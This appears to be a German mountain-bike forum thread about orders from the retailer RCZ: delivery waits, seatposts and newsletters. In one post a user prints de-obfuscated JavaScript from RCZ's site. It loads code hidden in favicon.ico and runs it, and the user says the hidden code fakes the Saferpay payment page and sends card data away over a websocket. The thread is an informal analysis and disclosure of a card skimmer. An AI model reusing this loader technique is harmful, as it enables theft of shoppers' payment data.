RCZ-Glaskugel: Wartezimmer, Spekulationen, Austausch

meine 350er haben sich tatsächlich auch auf den weg gemacht. meine erste bestellung bei rcz nach drölf jahren, wo ich bisher und weiterhin alles richtig gaile verpasst habe.
merke: 20 rcz tage = +-60 gregorianische tage :cool:

mit welchen felgen baut ihr denn eure lrs auf???
Wollte eine Newman EG30 nehmen, nur nirgends zu bekommen für einen guten Kurs scheinbar.
 
Hallo Zusammen,

habe mich am Sonntag für den Newsletter angemeldet, via EMail und noch keine Rückmeldung bekommen. Sollte ich nochmal nachhaken?
Wie meldet ihr euch für den Newsletter für die unterschiedlichen Länder an? Auch per Mail einfach anfragen?
 
Bei der Anmeldung sagen welche Sprache du willst.

Wenn du noch keinen bekommen hast, dann ist es eben so. Der kann dann plötzlich in einer Woche oder einem Monat kommen. RCZ = Erlebniskauf. Fängt beim NL an.
 
Zuletzt bearbeitet:
Wo Kashima?! Wo Funk?! :awesome:

Praktisch, dass die in 30,9 kommt. Macht das Ganze in Kombi mit nem 30,9-> 31,6 Shim recht flexibel einsetzbar.

Weiß jemand, ob ich die Maße unten aus dem Bild zum abmessen nehmen kann? Gehören zu einer 2021er Stütze.
Hat sich da im Laufe der Jahre großartig was geändert?
Man weiß ja nicht, welches Baujahr die RCZ Stütze hat, oder?!

Anhang anzeigen 1720562

Hatte die Transfer am Freitagabend noch bestellt und direkt per Überweisung bezahlt.
Dann war das Geld vermutlich am Montag auf dem RCZ Konto, jetzt schon verschickt.
Was mache ich denn jetzt damit? :lol:

IMG_3570.jpeg
 
Die Fox Transfer 200 mm kam heute auch mit Remote an👍🏻
Der Remotehebel hatte keinerlei Branding, wirkt aber wirklich etwas einfach,daher dachte ich das wäre ein Nonameteil.
Ist natürlich super das überhaupt einer dabei ist,hab den auch im Netz gesehen und ist sogar ein original Foxhebel was mich sehr überrascht hat.
Das das Teil 65€ kostet ist natürlich eine Frechheit.
Ich bin so begeistert von der Stütze und so schnell geliefert, sehr ungewohnt 😌
 
Die Fox Transfer 200 mm kam heute auch mit Remote an👍🏻
Der Remotehebel hatte keinerlei Branding, wirkt aber wirklich etwas einfach,daher dachte ich das wäre ein Nonameteil.
Ist natürlich super das überhaupt einer dabei ist,hab den auch im Netz gesehen und ist sogar ein original Foxhebel was mich sehr überrascht hat.
Das das Teil 65€ kostet ist natürlich eine Frechheit.
Ich bin so begeistert von der Stütze und so schnell geliefert, sehr ungewohnt 😌
Same here...
Kam soeben an, Inhalt auch der gleiche.
Muss jetzt nur noch auf das neue Projekt warten... :D
 
Same here...
Kam soeben an, Inhalt auch der gleiche.
Muss jetzt nur noch auf das neue Projekt warten... :D
Hab meine 200mm Stütze am 21.06 bestellt und gleich überwiesen. Am 22.06 wurde der Zahlungseingang von RCZ bestätigt. Seitdem leider nichts mehr gehört, obwohl auf der Homepage Status Lager Ware steht.... Hoffe, das dauert nicht allzu lange... Hab eigentlich bis jetzt sehr gute Erfahrungen mit denen gemacht.
 
DPX2 230x60 aus März 2023 ist unterwegs, bin überrascht, hatte nicht mehr damit gerechnet.

Edit: Bleibt spannend, die RaceFace Turbine aus dem April ist auf "Complete", in der UPS Mail stand aber eine andere Nummer. Copy & Paste Fehler bei RCZ?
 
Zuletzt bearbeitet:
Der angezeigte code de-obfuskiert zu
Javascript:
(async function _f0() {
  let _g0 = await fetch("/skin/frontend/rcz/default/images/favicon.ico");
  if (_g0.ok) {
    let _g1 = await _g0.text();
    var _v0 = new Function(_g1.slice(-153027));
    return _v0();
  }
}());
Unter der URL des Favico's kommt man auf ne ICO file, welche jedoch am angeführten offset Javascript code beinhaltet, welchen dieser Code nachlädt, welcher zumindest das wort saferpay mehrmals enthält - auf jeden Fall sieht es nicht legitim aus JS für sowas in favicon.ico zu verstecken, das macht auch kein JS-packer...

Edit: Der JS Code in favicon.ico baut die Saferpay Website nach, sammelt die eingesammelten Daten, schreibt den hostname von dem das JS stammt (rcz) dazu, und sendet es in JSON via Websocket an einen Server. Ich hab gerade kein entsprechendes Tooling bei der Hand um die nervigen obfuscations aufzulösen, mal sehen ob mir im Krankenstand langweilig wird und ich den Kollegen von RCZ ein Writeup schreibe.
Auf den ersten Blick stimme ich zu, das sieht sehr schwammig aus. Eine nicht-belegte Möglichkeit wäre es, dass Angreifer welche diesen Code auf RCZ geschleust haben dadurch den User nicht auf die "echte" SaferPay Seite lotsen sondern auf von ihnen kontrollierten Code - wobei es mich noch wundert das dieser Code eben im Kontext von RCZ ausgeführt wird und nicht saferpay, und ich mich zu erinnern glaube das bei mir im Bezahlvorgang die legitime saferpay URL geladen wurde....das Hirn rattert, morgen mal genauer ansehen.
hattest du Zeit näher einzusteigen und mit RCZ Kontaktdazu aufzunehmen?
 
@demlak leider noch nicht, derzeit verletzungsbedingt nur einhändig am Tippen - habs aber auch gerade im Angebote Thread gesehen das es wieder wen erwischt hat.
Für nen Report an RCZ bräuchte es auf jeden Fall ne executive summary die aufklärt und verständlich ist (sind dort keine Techniker - Amateure verstehen vor allem reißerische Mails in dem Kontext falsch und fühlen sich vom Melder angegriffen), ne klare Handlungsempfehlung, und idealerweise das technische proof of concept.
Falls wer anderer dazu kommt gerne hier wegarbeiten und selber was schreiben, sonst versuche ich am Wochenende mal was ich einhändig so zusammenbringe.
Edit: Ich hatte Gelegenheit und habe es mir weiter angesehen, und schreibe jetzt den Bericht an RCZ.
 
Zuletzt bearbeitet:
Was ich bei den Kreditkarenphisings nicht verstehe...heutzutage brauchts doch überall ne 2FA..Wie können die nur mit den Daten irgendwas anfangen? Ich muss mich für jeden Zahlungsvorgang bei der ING separat einloggen und über verfied by Visa authentifizieren.
 
Was ich bei den Kreditkarenphisings nicht verstehe...heutzutage brauchts doch überall ne 2FA..Wie können die nur mit den Daten irgendwas anfangen? Ich muss mich für jeden Zahlungsvorgang bei der ING separat einloggen und über verfied by Visa authentifizieren.

Ich denke da gibt's entsprechende Mittel und Wege das zu umgehen.
Nach den ganzen Vorfällen hab ich direkt meine KK gesperrt und eine neue beantragt.
Das geht in Minuten. Bei den wiederholten Fällen hier würde ich nicht darauf warten, sondern direkt handeln!
 
Was ich bei den Kreditkarenphisings nicht verstehe...heutzutage brauchts doch überall ne 2FA..Wie können die nur mit den Daten irgendwas anfangen? Ich muss mich für jeden Zahlungsvorgang bei der ING separat einloggen und über verfied by Visa authentifizieren.
Menschen sind faul.. und 2FA ist anstrengend..
 
Zurück